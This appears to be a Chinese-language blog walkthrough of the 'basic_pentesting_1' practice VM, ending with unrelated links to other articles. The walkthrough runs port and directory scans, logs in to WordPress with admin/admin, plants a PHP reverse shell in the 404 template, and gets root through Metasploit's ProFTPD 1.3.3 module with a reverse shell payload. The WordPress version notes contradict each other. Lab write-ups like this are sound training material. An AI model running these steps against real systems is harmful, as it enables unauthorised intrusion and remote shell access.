靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153

21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24

msf没发现可利用漏洞

wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了

404界面写入phpshell

shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php

把IP和port改成自己的,监听反弹

404监听不行,监听不到
WordPress 6.4.1

上传可以

在上传路径找到自己上传文件

换个方法

ftp端口开着

ProFTPD

搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

相关推荐
我科绝伦(Huanhuan Zhou)1 小时前
Systemctl 与 Systemd 全面指南:Linux 系统服务管理详解
linux·服务器·网络
world-wide-wait2 小时前
python高级05——HTTP协议和静态服务器
网络·网络协议·http
止水编程 water_proof2 小时前
Java--网络编程(二)
java·开发语言·网络
漫途科技2 小时前
物联网时代下无锡漫途科技无线多参数遥测终端助力饮水安全监测
科技·物联网·安全
沐浴露z3 小时前
【深入理解计算机网络10】UDP协议详解
网络·网络协议·计算机网络·udp
world-wide-wait4 小时前
python高级04——网络编程
linux·服务器·网络
特种加菲猫4 小时前
网络协议分层:解密TCP/IP五层模型
linux·网络·笔记
链上日记4 小时前
数字资产反诈指南:识别套路,守护WEEX账户安全
人工智能·安全
conkl4 小时前
Linux IP 网络配置与管理详解
linux·网络·tcp/ip
lerhxx5 小时前
Web安全两大基石:深入理解与防御XSS与CSRF攻击
前端·安全